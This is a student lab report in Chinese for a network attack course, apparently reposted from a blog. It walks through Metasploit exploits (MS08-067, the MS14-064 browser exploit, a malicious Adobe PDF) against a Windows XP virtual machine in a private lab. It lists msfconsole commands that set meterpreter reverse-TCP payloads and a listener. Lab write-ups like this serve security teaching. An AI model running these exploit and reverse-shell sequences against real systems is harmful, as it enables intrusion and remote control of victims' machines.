其他分享
首页 > 其他分享> > 2019-2020-2 网络对抗技术 20175230滕星 Exp6 MSF基础应用

2019-2020-2 网络对抗技术 20175230滕星 Exp6 MSF基础应用

作者:互联网

目录

一、预备知识

(1)MS08-067

(2)MS14-064

(3)Adobe

(4)MS03_026

二、实践内容

本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路。具体需要完成:

  1. 一个主动攻击实践,如ms08_067;
  2. 一个针对浏览器的攻击,如ms11_050;
  3. 一个针对客户端的攻击,如Adobe;
  4. 成功应用任何一个辅助模块。
    以上四个小实践可不限于以上示例,并要求至少有一个是和其他所有同学不一样的,否则扣除0.5分。

三、实践步骤

任务一:一个主动攻击实践MS08-067

攻击机:kali 192.168.80.128
靶机:Windows xp 192.168.80.136

set LHOST 192.168.80.128 //攻击机IP
set RHOSTS 192.168.80.136//靶机IP

任务二 一个针对浏览器的攻击MS14-064

靶机:Microsoft Windows XP(192.168.80.136)
攻击机:kali(192.168.80.128)

msfconsole
use exploit/windows/browser/ms14_064_ole_code_execution //选择攻击模块
show payloads //显示可用攻击载荷
set payload windows/meterpreter/reverse_tcp 
set SRVHOST 192.168.80.128 //设置攻击机IP
set AllowPowerShellPrompt 1 //因为msf中自带的漏洞利用exp调用的是powershell,所以msf中的exp代码只对安装powershell的系统生效
set LHOST 192.168.80.128
set LPORT 5230
set target 0 //设置winXP靶机
exploit


任务三:一个针对客户端的攻击Adobe

靶机:Microsoft Windows XP(192.168.80.136)
攻击机:kali(192.168.80.128)

msfconsole
use windows/fileformat/adobe_cooltype_sing //选择攻击模块
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.80.128 //攻击机 IP
set LPORT 5230
set FILENAME 20175230tx.pdf //设置生成的pdf文件名
exploit //发起攻击

use exploit/multi/handler //进入监听模块
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.80.128 //攻击机 IP
set LPORT 5230
exploit

任务四 成功应用任何一个辅助模块(唯一)

四、实验中遇到的问题

五、问题回答

六、实践体会

本次实践很有意义,每次攻击靶机成功时都忍不住的开心,但想到目前学会的东西只能用来攻击英文版的xp系统时,又觉得……在做本次实践时,过程比较顺利,没有像上一次实践一样历经坎坷。

标签:滕星,set,067,攻击,192.168,漏洞,20175230,2020,靶机
来源: https://www.cnblogs.com/tengxing/p/12794989.html